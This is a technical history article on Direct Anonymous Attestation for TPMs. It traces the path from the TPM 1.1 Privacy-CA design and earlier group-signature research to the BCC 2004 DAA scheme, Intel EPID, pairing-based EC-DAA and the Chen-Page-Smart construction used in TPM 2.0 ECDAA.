The broker introduced by the TCG in TPM 1.1 to separate the unique-by-design Endorsement Key from the per-attestation Attestation Identity Key. The Privacy-CA verifies the EK certificate, attests that the AIK is bound to a real TPM, and issues a certificate on the AIK that the platform then uses to sign quotes. The privacy property is operational, not cryptographic: the CA promises not to log the linkage between EK and AIK [@wiki-daa].
&lt;p&gt;The architecture has three structural problems, and the Wikipedia summary of the original TPM 1.1 design makes the most uncomfortable one explicit: &quot;privacy requirements may be violated if the privacy CA and verifier collude&quot; [@wiki-daa]. The Privacy-CA &lt;em&gt;can&lt;/em&gt; link AIKs to EKs. It promises not to. That promise is enforceable by audit, by legal contract, by reputation, and by the threat of a regulator finding out. It is not enforceable by mathematics.&lt;/p&gt;
&lt;p&gt;The other two problems are availability and concentration. Wikipedia again, on the TPM 1.1 design: &quot;the privacy CA must take part in every transaction&quot; [@wiki-daa]. Every AIK certification is a synchronous network round-trip to a single CA. The CA is therefore a high-availability target, a high-value attack target, and a high-throughput service obligation for whoever decides to operate one. The FIDO Alliance, fifteen years later, wrote down the operational consequences of that obligation with surprising frankness in its ECDAA Algorithm v2.0 specification [@fido-ecdaa-v2]:&lt;/p&gt;

An alternative approach to &apos;group&apos; keys is the use of individual keys combined with a Privacy-CA [TPMv1-2-Part1]. Translated to FIDO, this approach would require one Privacy-CA interaction for each Uauth key. This means relatively high load and high availability requirements for the Privacy-CA. Additionally the Privacy-CA aggregates sensitive information (i.e. knowing the relying parties the user interacts with). This might make the Privacy-CA an interesting attack target. -- FIDO ECDAA Algorithm v2.0 Implementation Draft, 2018
&lt;p&gt;The FIDO document was written in 2018, but it is operating on a problem that was current in 2003. The Privacy-CA model concentrates the very identifiers it is supposed to anonymize. A regulator with a subpoena, an insider with a database query, or a successful attacker with persistent access can recover the linkage the CA promised to forget. In 2003 the TCG named the missing primitive -- a &lt;em&gt;direct&lt;/em&gt; attestation scheme whose anonymity was guaranteed by math rather than a CA&apos;s promise -- and the cryptographic literature went to work on it.The privacy-advocate criticism of the TPM in the 2003-2005 window came from a small but well-placed group. Ross Anderson at Cambridge had been writing critical surveys of trusted computing since 2002, both in a continuously updated TCPA FAQ [@anderson-tcpa-faq] and in a PODC 2003 paper &quot;Cryptography and Competition Policy -- Issues with Trusted Computing&quot; [@anderson-tcpa-paper]. Seth Schoen and the Electronic Frontier Foundation published a 2003 white paper, &quot;Trusted Computing: Promise and Risk,&quot; on the privacy implications of trusted-computing-class identifiers [@eff-schoen-2003]. European data-protection authorities had begun studying TCPA in the same window [@anderson-tcpa-faq]. The DAA construction was, by 2004, a research community answer to these criticisms more than it was a TCG product requirement.&lt;/p&gt;
&lt;p&gt;The Privacy-CA architecture is still production architecture in 2026. Microsoft Azure Attestation runs a Privacy-CA in everything but name. Its public documentation describes a CA-mediated flow whose five-step shape mirrors the TPM 1.1 Privacy-CA almost line for line: &quot;A certification authority (CA) establishes trust in the TPM either via EKPub or EKCert... The CA issues a certificate with a special issuance policy to denote that the key is now attested as protected by a TPM&quot; [@azure-attestation]. The full verbatim Microsoft Learn quote is reproduced in §9, where it anchors the Windows case study.&lt;/p&gt;
&lt;p&gt;The same pattern repeats across every hyperscaler. AWS Nitro Enclaves produces signed attestation documents, verified against an AWS-operated X.509 certificate chain, that contain enclave measurements (PCRs) and instance/module identifiers [@aws-nitro-attestation]. Apple App Attest issues per-app device identifiers from Apple-operated infrastructure [@apple-app-attest]. Google Play Integrity ships integrity verdicts signed by Google-operated infrastructure [@google-play-integrity]. In 2026 the operational descendants of TPM 1.1&apos;s Privacy-CA broker run the production attestation surface of every consumer-grade cloud platform.&lt;/p&gt;

flowchart TD
    M[&quot;TPM manufacturer&quot;] --&amp;gt;|&quot;signs EK with EKCert&quot;| EK[&quot;EK in TPM&quot;]
    EK --&amp;gt; AIK[&quot;TPM generates AIK&quot;]
    AIK --&amp;gt;|&quot;(EKCert, AIKpub, proof)&quot;| CA[&quot;Privacy-CA&quot;]
    CA --&amp;gt;|&quot;issues Cert(AIKpub)&quot;| Plat[&quot;Platform&quot;]
    Plat --&amp;gt;|&quot;AIK signs quote&quot;| V[&quot;Verifier / Relying Party&quot;]
    CA -.-&amp;gt;|&quot;can link AIK to EK&lt;br /&gt;(promises not to)&quot;| AIK
&lt;p&gt;By 2003 the field had a name for the missing primitive: a direct attestation scheme that delivered the Privacy-CA&apos;s anonymity property cryptographically rather than operationally. What followed was an academic lineage that had been quietly building, for a decade and a half, the primitives that lineage required.&lt;/p&gt;
&lt;h2&gt;3. The Pre-History: Group Signatures Before DAA (1991-2003)&lt;/h2&gt;
&lt;p&gt;Direct Anonymous Attestation was invented in 2004. The primitive it was built from was invented in 1991, in a paper that had nothing to do with TPMs.&lt;/p&gt;
&lt;p&gt;David Chaum and Eugene van Heyst presented &quot;Group Signatures&quot; at EUROCRYPT 1991 [@chaum-vh-1991]. The construction was a curiosity: a digital signature scheme in which any one of &lt;code&gt;n&lt;/code&gt; group members could sign on behalf of the group, the verifier could check that &lt;em&gt;some&lt;/em&gt; member of the group signed, and a designated &lt;em&gt;group manager&lt;/em&gt; could, given a signature, recover the identity of the signer. The use case Chaum and van Heyst had in mind was organizational: a company spokesperson signs press releases on behalf of the company; the CEO can, if necessary, recover which spokesperson signed which release.&lt;/p&gt;

A digital signature scheme in which any one of `n` group members can sign on behalf of the group such that (i) verifiers can confirm &quot;some member of the group signed this message&quot; using a single group public key, (ii) verifiers cannot determine which member signed, and (iii) a designated group manager, holding a trapdoor, can *open* any signature to recover the original signer. Chaum and van Heyst introduced the primitive in 1991; the next decade was about making the construction efficient enough to deploy [@wiki-group].
&lt;p&gt;The 1991 construction had a fatal practical property: signature size was linear in the size of the group. A 10,000-member group meant a 10,000-component signature. For a primitive intended to handle organizational use cases at organizational scale, this was a non-starter. The next decade is a sequence of papers, each adding one property to the previous, each addressing the issue that made the previous unfit for deployment.&lt;/p&gt;
&lt;p&gt;Jan Camenisch and Markus Stadler, at CRYPTO 1997, gave the field its first constant-size group signature -- signature length independent of the number of group members, suitable for groups of arbitrary size [@camenisch-stadler-1997]. Their construction relied on a particular kind of zero-knowledge proof of knowledge of a discrete logarithm whose form would, six years later, become the structural template for DAA&apos;s Sign protocol. The CS97 scheme had its own problems -- the security proof made strong assumptions, and the construction was vulnerable to &quot;framing&quot; attacks where a malicious group manager could forge signatures attributable to other members -- but the size barrier was broken.&lt;/p&gt;
&lt;p&gt;Three years later, at CRYPTO 2000, Giuseppe Ateniese, Jan Camenisch, Marc Joye, and Gene Tsudik introduced what the field now calls the ACJT scheme [@acjt-2000]. The Springer abstract is unusually direct about what ACJT contributed: the paper &quot;introduces a new provably secure group signature... proven secure and coalition-resistant under the strong RSA and the decisional Diffie-Hellman assumptions.&quot; The property that made ACJT important was &lt;em&gt;coalition resistance&lt;/em&gt; -- a formal guarantee that no subset of &lt;code&gt;k&lt;/code&gt; group members, no matter how large, could collude to produce a valid signature that did not open to one of them. ACJT&apos;s security proofs were the first in the group-signature literature to treat coalitions as a first-class threat model.Coalition resistance as a property predated ACJT, but coalition resistance as a &lt;em&gt;formal&lt;/em&gt; property -- something proven against an adversary defined in a complexity-theoretic model -- did not. Camenisch and Michels in 1998, and several authors in between, had given coalition-resistance arguments that depended on heuristic assumptions about the underlying hash function or signature scheme [@camenisch-michels-1998]. ACJT 2000 gave the proof under the strong RSA assumption, which by 2000 was a well-understood number-theoretic conjecture that the cryptographic community treated as a load-bearing security primitive.&lt;/p&gt;
&lt;p&gt;ACJT was the construction the DAA designers built on. The reason is in its protocol structure. The ACJT signer holds a &lt;em&gt;signed credential&lt;/em&gt; on a secret membership value &lt;code&gt;f&lt;/code&gt;. Signing a message means producing a non-interactive zero-knowledge proof of knowledge of &lt;code&gt;(f, signature)&lt;/code&gt; satisfying the group manager&apos;s verification equation, bound to the message. The proof is constant-size; the verifier checks it against the group public key and learns only that &lt;em&gt;some&lt;/em&gt; member signed.&lt;/p&gt;
&lt;p&gt;Jan Camenisch and Anna Lysyanskaya, working in parallel, were building the other primitive DAA would need. Their EUROCRYPT 2001 paper introduced what the field now calls CL credentials -- a digital signature scheme with two unusual properties [@cl-2001]. First, a signer can issue a signature on a &lt;em&gt;committed&lt;/em&gt; value &lt;code&gt;Commit(f)&lt;/code&gt; without seeing &lt;code&gt;f&lt;/code&gt; itself, so the holder of &lt;code&gt;f&lt;/code&gt; ends up with a signature on something the signer never learned. Second, a holder of &lt;code&gt;(f, signature)&lt;/code&gt; can prove possession of that pair in zero knowledge, revealing neither &lt;code&gt;f&lt;/code&gt; nor the signature itself.&lt;/p&gt;

A digital signature scheme with two algorithmic protocols on top of the standard sign-and-verify pair. A *blind issuance* protocol lets a signer issue a signature on a value the signer cannot see (the holder commits to a value `f` and proves the commitment well-formed; the signer signs the commitment without learning `f`). A *proof-of-possession* protocol lets a holder of `(f, signature)` prove &quot;I have a CL signature from this signer on some value&quot; without revealing either the value or the signature. CL signatures are the primitive a DAA Issuer uses to issue the long-lived attestation credential the TPM keeps after the Join protocol [@cl-2001] [@cl-2004].
&lt;p&gt;CL signatures gave the field a clean way to issue a member credential without the issuer ever learning the member&apos;s secret -- exactly the property a TPM needs when receiving a long-lived DAA credential from an issuer who, by design, must remain unable to recognize the TPM later. Camenisch and Lysyanskaya&apos;s CRYPTO 2004 paper extended the construction to bilinear pairings [@cl-2004], a generalization that would matter for the elliptic-curve DAA schemes of the next decade.&lt;/p&gt;

flowchart LR
    A[&quot;Chaum-van Heyst 1991&lt;br /&gt;Primitive defined&lt;br /&gt;Linear-size signatures&quot;] --&amp;gt; B[&quot;Camenisch-Stadler 1997&lt;br /&gt;Constant-size signatures&quot;]
    B --&amp;gt; C[&quot;ACJT 2000&lt;br /&gt;Coalition resistance&lt;br /&gt;Strong RSA + DDH&quot;]
    C --&amp;gt; D[&quot;Brickell-Camenisch-Chen 2004&lt;br /&gt;DAA-RSA&quot;]
    A --&amp;gt; E[&quot;Camenisch-Lysyanskaya 2001&lt;br /&gt;Blind issuance&lt;br /&gt;Proof of possession&quot;]
    E --&amp;gt; D
    E --&amp;gt; F[&quot;Camenisch-Lysyanskaya 2004&lt;br /&gt;CL on bilinear pairings&quot;]
    F --&amp;gt; G[&quot;Chen-Page-Smart 2010&lt;br /&gt;EC-DAA&quot;]
&lt;p&gt;A sibling lineage was building in parallel. Dan Boneh, Xavier Boyen, and Hovav Shacham presented &quot;Short Group Signatures&quot; at CRYPTO 2004 [@bbs-2004]. The BBS scheme used bilinear pairings to compress group signatures to a few hundred bytes -- signatures, in the abstract&apos;s words, &quot;approximately the size of a standard RSA signature with the same security.&quot; BBS gave the W3C Verifiable Credentials community a primitive that descendants like BBS+ would later use for selective-disclosure credentials. BBS itself did not become the TPM construction. The DAA designers, working from ACJT and CL, took a different path.&lt;/p&gt;
&lt;p&gt;By 2003 the primitives existed. The TPM community had the use case. The two communities had not yet met. In 2004, three authors at three different industrial labs made the introduction.&lt;/p&gt;
&lt;h2&gt;4. The Breakthrough: DAA-RSA (Brickell-Camenisch-Chen, CCS 2004)&lt;/h2&gt;
&lt;p&gt;The introduction happened at ACM CCS 2004. Ernie Brickell at Intel, Jan Camenisch at IBM Zurich, and Liqun Chen at HP Labs Bristol published &quot;Direct Anonymous Attestation&quot; [@bcc-2004]. The IACR ePrint abstract makes the structural contribution explicit:&lt;/p&gt;

Direct anonymous attestation can be seen as a group signature without the feature that a signature can be opened, i.e., the anonymity is not revocable. Moreover, DAA allows for pseudonyms, i.e., for each signature a user (in agreement with the recipient of the signature) can decide whether or not the signature should be linkable to another signature. DAA furthermore allows for detection of &apos;known&apos; keys: if the DAA secret keys are extracted from a TPM and published, a verifier can detect that a signature was produced using these secret keys. -- BCC 2004 (IACR ePrint 2004/205)
&lt;p&gt;Two design moves did the work, and naming them clearly is the first step in understanding why DAA solved the Privacy-CA problem.&lt;/p&gt;
&lt;p&gt;The first move is a &lt;em&gt;subtraction&lt;/em&gt;. Every prior group-signature scheme -- Chaum-van Heyst, Camenisch-Stadler, ACJT, BBS -- gave a designated group manager the power to &lt;em&gt;open&lt;/em&gt; a signature and recover its signer. For a TPM attestation primitive, the opening capability is undesirable. An issuer who can open is morally a Privacy-CA: it has the linkage information the architecture is supposed to forget. BCC 2004 removes the opening capability entirely. No party can de-anonymize a signature -- not the issuer, not the verifier, not a coalition of either. The IACR ePrint 2004/205 abstract captures the consequence: DAA &quot;can be seen as a group signature without the feature that a signature can be opened, i.e., the anonymity is not revocable&quot; [@bcc-2004]. Once the credential is issued, the issuer has no cryptographic handle left to break the user&apos;s privacy.&lt;/p&gt;

A zero-knowledge attestation primitive in which a TPM holds a long-lived membership credential (the output of a one-time Join protocol with an Issuer) and can subsequently produce signatures that prove &quot;the signing TPM holds a credential certified by this Issuer&quot; without revealing which TPM signed and without an online third party in the verification path. No party -- not the Issuer, not the Verifier, not a coalition of either -- can de-anonymize a DAA signature. The construction first appeared in Brickell-Camenisch-Chen 2004 [@bcc-2004].
&lt;p&gt;The second move is a &lt;em&gt;substitution&lt;/em&gt;. Where prior schemes traced misbehaving signers by manager-controlled opening, DAA introduces a &lt;em&gt;user-controlled&lt;/em&gt; linkability mechanism through what the BCC paper calls a basename-keyed pseudonym. The signing TPM holds a secret membership value &lt;code&gt;f&lt;/code&gt;. The verifier supplies a &lt;em&gt;basename&lt;/em&gt; &lt;code&gt;bsn&lt;/code&gt; (a string the verifier picks per session, per relying party, or per global epoch). The TPM derives a pseudonym&lt;/p&gt;
&lt;p&gt;$$N_V = \zeta^f \pmod \Gamma, \qquad \zeta = H_\Gamma(\text{bsn})$$&lt;/p&gt;
&lt;p&gt;where &lt;code&gt;H_Γ&lt;/code&gt; hashes the basename into a generator of a multiplicative group &lt;code&gt;Γ&lt;/code&gt;. The pseudonym &lt;code&gt;N_V&lt;/code&gt; has two structural properties. If the same verifier reuses the same &lt;code&gt;bsn&lt;/code&gt; across sessions, signatures from the same TPM produce the same &lt;code&gt;N_V&lt;/code&gt;, so the verifier can link them (and blacklist them if needed). If the verifier randomizes &lt;code&gt;bsn&lt;/code&gt; per session, or sets &lt;code&gt;bsn&lt;/code&gt; to the special value &lt;code&gt;⊥&lt;/code&gt; indicating &quot;no linkability,&quot; signatures from the same TPM produce different &lt;code&gt;N_V&lt;/code&gt; values that are indistinguishable from random.&lt;/p&gt;

A DAA property in which the *verifier* chooses a basename `bsn` per session or per relying party. Signatures from the same TPM under the same basename produce the same pseudonym; signatures under different basenames produce pseudonyms indistinguishable from random. The TPM, not a group manager, controls which signatures are linkable to which others. The Bernhard-Fuchsbauer-Ghadafi-Smart-Warinschi 2013 paper gives the canonical formal model [@bfgsw-2013].
&lt;p&gt;Together the subtraction and the substitution define the DAA contract. The Issuer issues a CL signature on the TPM&apos;s secret &lt;code&gt;f&lt;/code&gt; during a one-time Join. The TPM thereafter holds the credential &lt;code&gt;(f, A, e, v)&lt;/code&gt; -- the secret membership value plus the CL signature components. To sign a message &lt;code&gt;m&lt;/code&gt; against a verifier-supplied basename &lt;code&gt;bsn&lt;/code&gt;, the TPM:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Computes the pseudonym &lt;code&gt;N_V = ζ^f mod Γ&lt;/code&gt; where &lt;code&gt;ζ = H_Γ(bsn)&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Randomizes the CL signature: picks a fresh &lt;code&gt;w&lt;/code&gt;, computes &lt;code&gt;T_1 = A · S^w mod n&lt;/code&gt; and &lt;code&gt;T_2 = g^e · h^w mod n&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Produces a Fiat-Shamir non-interactive zero-knowledge proof of knowledge of &lt;code&gt;(f, A, e, v, w)&lt;/code&gt; satisfying the CL verification equation&lt;/p&gt;
&lt;p&gt;$$A^e \equiv Z / (R^f \cdot S^{v&apos; + v&apos;&apos;}) \pmod n,$$&lt;/p&gt;
&lt;p&gt;binding the proof to the tuple &lt;code&gt;(m, T_1, T_2, N_V)&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;A verifier checks the proof against the Issuer&apos;s public key. The verifier learns nothing about &lt;code&gt;f&lt;/code&gt;, nothing about the TPM&apos;s identity, nothing about which CL signature was randomized -- and either gains a linkable pseudonym (if &lt;code&gt;bsn&lt;/code&gt; was reused) or no linkability at all (if &lt;code&gt;bsn&lt;/code&gt; was fresh).&lt;/p&gt;
&lt;p&gt;The architectural picture, set against §2&apos;s Privacy-CA flow, makes the contrast vivid.&lt;/p&gt;

flowchart TD
    I[&quot;Issuer&lt;br /&gt;(holds CL signing key)&quot;]
    T[&quot;TPM&lt;br /&gt;(holds secret f)&quot;]
    V[&quot;Verifier&lt;br /&gt;(holds Issuer pub key)&quot;]
    I -.-&amp;gt;|&quot;one-time Join&lt;br /&gt;CL signature on f&lt;br /&gt;(blind, issuer never sees f)&quot;| T
    T --&amp;gt;|&quot;credential (f, A, e, v)&lt;br /&gt;stored in TPM forever&quot;| T
    T --&amp;gt;|&quot;DAA-Sign(m, bsn)&lt;br /&gt;= randomized credential + NIZK + N_V&quot;| V
    V --&amp;gt;|&quot;Verify against Issuer pub key&lt;br /&gt;(no online interaction)&quot;| V
&lt;p&gt;This is the first aha. The reader entered §3 thinking &quot;anonymity with manager-controlled traceability&quot; was the goal of group signatures. They exit §4 understanding that for TPM attestation the goal is &lt;em&gt;anonymity without any opener&lt;/em&gt; plus &lt;em&gt;user-controlled, per-verifier linkability&lt;/em&gt;. The breakthrough is structurally a subtraction (remove the opener) plus a substitution (per-verifier basename pseudonyms in place of manager-controlled opening). It is not an addition.Eleven years after BCC 2004, Ben Smyth, Mark Ryan, and Liqun Chen ran a formal analysis of the original BCC construction and found a retroactive privacy bug [@smyth-ryan-chen-2015]. The bug allowed certain Issuer-coalition adversaries to link signatures across basenames in ways the original security argument had not anticipated. The bug was fixed in the 2008-2010 redesigns (specifically the BCL 2009 simplified-security-notions paper [@bcl-2009] and the CDL 2016 strong-Diffie-Hellman revisitation). The reader interested in why &quot;we proved this in 2004&quot; is not the same as &quot;this is provably secure in 2026&quot; should read SRC 2015 alongside the original BCC abstract.&lt;/p&gt;
&lt;p&gt;On paper, the BCC 2004 construction solved the Privacy-CA trap. In practice, DAA-RSA was hard to ship. The CL signature in the original scheme used strong RSA moduli at 2048 bits. A single Sign operation took several seconds on the TPM 1.2 hardware of the time. The signature itself was approximately 2.5 kilobytes -- larger than the entire AIK signature output a Privacy-CA-mediated attestation produced. TPM 1.2 shipped DAA-RSA as an optional capability when revision 94 of the spec added it in 2005 [@tpm-library-spec]. Almost no platform integrator turned it on. The cryptography worked. The implementation budget did not.&lt;/p&gt;
&lt;p&gt;The next decade was about making the construction small enough to deploy. The path was anything but straight.&lt;/p&gt;
&lt;h2&gt;5. The Evolution: From RSA-DAA to EC-DAA (2007-2013)&lt;/h2&gt;
&lt;p&gt;Six papers in seven years, two industrial branches, one dead end, one production scheme. Why was the EC-DAA story so much harder than it should have been?&lt;/p&gt;
&lt;p&gt;The honest answer: the entire toolkit of pairing-based cryptography arrived at the same time the TPM industry needed it, and the field discovered in real time that not every choice of pairing was safe. The path from BCC 2004 to the construction the TPM 2.0 spec actually shipped runs through five waypoints, each addressing the problem the previous one created.&lt;/p&gt;
&lt;h3&gt;5.1 Brickell-Li 2007: EPID and signature-based revocation&lt;/h3&gt;
&lt;p&gt;In 2007 Ernie Brickell, now leading Intel&apos;s trusted-computing work, and Jiangtao Li published &quot;Enhanced Privacy ID: A Direct Anonymous Attestation Scheme with Enhanced Revocation Capabilities&quot; at WPES 2007 [@brickell-li-epid-2007]. The journal version appeared at IEEE TDSC in 2012 [@brickell-li-tdsc-2012]. The single feature EPID added was a revocation list called Sig-RL: a list of &lt;em&gt;signatures&lt;/em&gt; the issuer wished to disavow. A verifier, given a signature &lt;code&gt;σ&lt;/code&gt; and a Sig-RL containing entries &lt;code&gt;σ_1, ..., σ_k&lt;/code&gt;, could prove that &lt;code&gt;σ&lt;/code&gt; was not produced by the same TPM as any &lt;code&gt;σ_i&lt;/code&gt; -- without learning the linking information itself.&lt;/p&gt;
&lt;p&gt;EPID became Intel&apos;s production attestation primitive. Wikipedia records the deployment scale: &quot;It has been incorporated in several Intel chipsets since 2008,&quot; and &quot;at RSAC 2016 Intel disclosed that it has shipped over 2.4B EPID keys since 2008&quot; [@wiki-epid]. EPID is what Intel SGX enclaves used to attest, before SGX attestation migrated to the vendor-CA DCAP architecture. EPID is what certain Intel-platform Widevine L1 implementations use to attest content-decryption modules. The Intel EPID SDK (the reference implementation) was eventually marked public-archive on GitHub [@epid-sdk]. The Wikipedia entry notes that the original EPID 2.0 specification was contributed by Intel into ISO/IEC 20008 and 20009 under royalty-free terms [@wiki-epid].&lt;/p&gt;
&lt;p&gt;EPID is not exactly DAA. EPID is a DAA variant with the Sig-RL revocation layer added. The Chen-Page-Smart construction that TPM 2.0 actually ships is closer to BCC 2004 plus an elliptic-curve substrate; EPID 2.0 is closer to BCC 2004 plus EC plus Sig-RL plus Intel&apos;s specific basename and key-management conventions. The two converge at the cryptographic core and diverge at the deployment surface.&lt;/p&gt;
&lt;h3&gt;5.2 Brickell-Chen-Li 2008: the first pairing-based DAA&lt;/h3&gt;
&lt;p&gt;At the TRUST 2008 conference, Ernie Brickell, Liqun Chen, and Jiangtao Li published &quot;A New Direct Anonymous Attestation Scheme from Bilinear Maps&quot; -- the first DAA scheme constructed over bilinear pairings instead of strong RSA [@bcl-2008]. Signature size dropped by an order of magnitude relative to BCC 2004, from roughly 2.5 kilobytes to a few hundred bytes [@bcl-2008]. TPM-side sign time, on hardware that supported elliptic-curve arithmetic, came down from seconds to fractions of a second [@bcl-2008]. The construction used symmetric (Type-1) pairings -- pairings where the two input groups &lt;code&gt;G_1&lt;/code&gt; and &lt;code&gt;G_2&lt;/code&gt; are the same -- which the implementation community would, two or three years later, decide were too inefficient for production TPM hardware.&lt;/p&gt;

A function `e : G_1 × G_2 -&amp;gt; G_T` on three elliptic-curve subgroups satisfying *bilinearity* (for all integers `a, b` and points `P ∈ G_1, Q ∈ G_2`, `e(aP, bQ) = e(P, Q)^(ab)`) and *non-degeneracy*. Type-3 (asymmetric) pairings, in which `G_1 ≠ G_2` and no efficient homomorphism is known between them, are the production pairing for TPM 2.0 ECDAA because they admit faster implementations and tighter security reductions than Type-1 (symmetric) pairings. The Chen-Page-Smart 2010 construction is built on Type-3 pairings over Barreto-Naehrig curves [@cps-2010].
&lt;h3&gt;5.3 Chen-Morrissey-Smart 2008: the asymmetric proposal and its proof flaw&lt;/h3&gt;
&lt;p&gt;Pairing 2008 hosted the next move. Liqun Chen, Paul Morrissey, and Nigel Smart published &quot;Pairings in Trusted Computing&quot; [@cms-pairing-2008], proposing a DAA scheme on asymmetric Type-3 pairings -- the kind that admit Barreto-Naehrig curves and the speed-ups TPM hardware needed. The same authors published a companion ProvSec 2008 paper &quot;On Proofs of Security for DAA Schemes&quot; providing the security argument [@cms-provsec-2008].&lt;/p&gt;
&lt;p&gt;Two years later, in Information Processing Letters, Liqun Chen and Jiangtao Li published &quot;A note on the Chen-Morrissey-Smart Direct Anonymous Attestation scheme&quot; [@chen-li-2010] showing that the CMS asymmetric-pairing construction had a flawed proof. The cryptographic intuition was correct; the proof technique used an assumption that did not hold in the asymmetric-pairing setting the construction relied on.The Chen-Morrissey-Smart episode is, in 2026, one of the most cited proof-flaw stories in pairing-based cryptography precisely because the construction was simple and the flaw was subtle. The mathematical content of the scheme was salvageable. The security argument was not. The lesson the field took away -- a proof in the symmetric-pairing model does not transfer to the asymmetric-pairing model without a separate argument -- has been a load-bearing convention in cryptographic publishing since.&lt;/p&gt;
&lt;h3&gt;5.4 Chen-Page-Smart 2010: the scheme TPM 2.0 actually ships&lt;/h3&gt;
&lt;p&gt;The fix arrived at CARDIS 2010 in Passau in April 2010 [@cardis-book]. Liqun Chen, Dan Page, and Nigel Smart published &quot;On the Design and Implementation of an Efficient DAA Scheme&quot; [@cps-2010] [@cps-2010-eprint], proposing an asymmetric-pairing DAA over Barreto-Naehrig curves with a Sign protocol &lt;em&gt;split&lt;/em&gt; between the TPM and the host. The TPM, in the new design, performed only the cryptographic operations that absolutely required custody of the secret &lt;code&gt;f&lt;/code&gt;: it produced commitment points and computed a Schnorr-style response over those commitments. The host -- a comparatively powerful general-purpose CPU sitting in front of the TPM -- composed the Fiat-Shamir challenge, performed the pairing computations, and assembled the final signature.&lt;/p&gt;
&lt;p&gt;The Chen-Page-Smart construction is the scheme TPM 2.0 actually ships. The Wikipedia DAA article makes the attribution direct, in a sentence that is itself the most-cited single primary-source extract in this article:&lt;/p&gt;

Chen, Page, and Smart proposed a new elliptic curve cryptography scheme using Barreto-Naehrig curves. This scheme is implemented by both EPID 2.0 and the TPM 2.0 standard. -- Wikipedia, *Direct Anonymous Attestation* [@wiki-daa]

A family of pairing-friendly elliptic curves with embedding degree 12, parameterized by an integer `u` to admit Type-3 pairings whose arithmetic is fast enough for resource-constrained devices [@bn-2006]. The curve identifier `TPM_ECC_BN_P256` (`0x0010`) is the specific 256-bit instance the TPM 2.0 Library Specification mandates for ECDAA, picked because of its pairing-friendly structure rather than as a NIST P-256 equivalent.
&lt;p&gt;Six years after CPS 2010, Taechan Kim and Razvan Barbulescu (CRYPTO 2016) published &quot;Extended Tower Number Field Sieve: A New Complexity for the Medium Prime Case,&quot; giving an improved sieve attack against pairing-friendly elliptic curves at the 256-bit BN level. The improvement dropped the practical security of BN-256 from roughly 128 bits to roughly 100 bits [@kim-barbulescu-2016]. The TCG normative text for TPM 2.0 ECDAA did not, as of late 2025, change the mandatory curve in response. This is the kind of cryptographic technical debt that lives quietly in deployed systems for a decade -- specs do not migrate on the same calendar as research moves.&lt;/p&gt;
&lt;h3&gt;5.5 BFGSW 2013 and SRC 2015: the formal closure&lt;/h3&gt;
&lt;p&gt;The cryptographic engineering of EC-DAA was done by 2010. What the field still owed itself was a clean security model: one definition of &quot;secure DAA&quot; that captured the user-controlled-linkability property and the TPM/host split, against which any candidate scheme could be evaluated.&lt;/p&gt;
&lt;p&gt;In 2013 David Bernhard, Georg Fuchsbauer, Essam Ghadafi, Nigel Smart, and Bogdan Warinschi published &quot;Anonymous attestation with user-controlled linkability&quot; in the &lt;em&gt;International Journal of Information Security&lt;/em&gt; [@bfgsw-2013] [@bfgsw-2013-eprint]. The BFGSW paper formalized the user-controlled-linkability property the BCC 2004 abstract had described in prose, introduced a clean separation of &quot;pre-DAA signing&quot; (TPM-side operations) from &quot;DAA signing&quot; (TPM + host composition), and proved the security of a representative construction in the resulting model.&lt;/p&gt;
&lt;p&gt;In 2015, Ben Smyth, Mark Ryan, and Liqun Chen published the retroactive analysis that closed the BCC 2004 privacy bug [@smyth-ryan-chen-2015]. By 2015 the cryptography was, formally, settled.&lt;/p&gt;
&lt;p&gt;In 2016 Jan Camenisch, Manu Drijvers, and Anja Lehmann revisited the construction at TRUST 2016 in &quot;Anonymous Attestation Using the Strong Diffie Hellman Assumption Revisited&quot; [@cdl-2016] [@cdl-2016-eprint], giving a tighter security argument under the q-SDH assumption and providing a fix for a Diffie-Hellman-oracle issue in the TPM 2.0 ECDAA interface that &quot;One TPM to Bind Them All&quot; would document in 2017 [@one-tpm-2017]. The CDL16 scheme is what most modern DAA library code references as the canonical construction.&lt;/p&gt;

flowchart LR
    BCC[&quot;BCC 2004&lt;br /&gt;RSA-DAA&lt;br /&gt;TPM 1.2&quot;] --&amp;gt; BL[&quot;Brickell-Li 2007&lt;br /&gt;EPID + Sig-RL&lt;br /&gt;Intel SGX / Widevine&quot;]
    BCC --&amp;gt; BCL[&quot;BCL 2008&lt;br /&gt;Type-1 pairing DAA&quot;]
    BCL --&amp;gt; CMS[&quot;CMS 2008&lt;br /&gt;Asymmetric pairing&lt;br /&gt;(broken by CL 2010)&quot;]
    BCL --&amp;gt; CPS[&quot;CPS 2010&lt;br /&gt;Type-3 BN-curve DAA&lt;br /&gt;TPM 2.0 ECDAA&quot;]
    CPS --&amp;gt; BFGSW[&quot;BFGSW 2013&lt;br /&gt;Formal user-controlled&lt;br /&gt;linkability model&quot;]
    BFGSW --&amp;gt; CDL[&quot;CDL 2016&lt;br /&gt;q-SDH revisitation&lt;br /&gt;Canonical modern DAA&quot;]
    BCC --&amp;gt; SRC[&quot;SRC 2015&lt;br /&gt;Retroactive BCC&lt;br /&gt;privacy bug&quot;]
&lt;p&gt;By 2013 the cryptography was complete. The standards organizations took the construction and made it official -- in two different specifications, on two parallel tracks.&lt;/p&gt;
&lt;h2&gt;6. The TPM 2.0 ECDAA Surface (2014-Present)&lt;/h2&gt;
&lt;p&gt;If you own a Windows laptop with a TPM 2.0, this section is the part of the chip you have never used. What does the spec actually say?&lt;/p&gt;
&lt;p&gt;The TPM 2.0 Library Specification, the canonical document published by the Trusted Computing Group, is a four-part normative reference [@tpm-library-spec]. Part 1 (Architecture) describes the threat model and the mathematical primitives. Part 2 (Structures) defines the data types every TPM command accepts and returns. Part 3 (Commands) defines the commands themselves. Part 4 (Supporting Routines) gives a reference C implementation. The ECDAA surface lives across all four parts.&lt;/p&gt;

An algorithm identifier defined in TPM 2.0 Library Specification Part 2 and selectable from any `TPMT_SIG_SCHEME` field. A signing key tagged with `TPM_ALG_ECDAA` produces signatures using the Chen-Page-Smart 2010 elliptic-curve DAA construction. The same algorithm identifier appears in any signature-scheme negotiation point in the TPM 2.0 command surface [@tpm-library-spec].

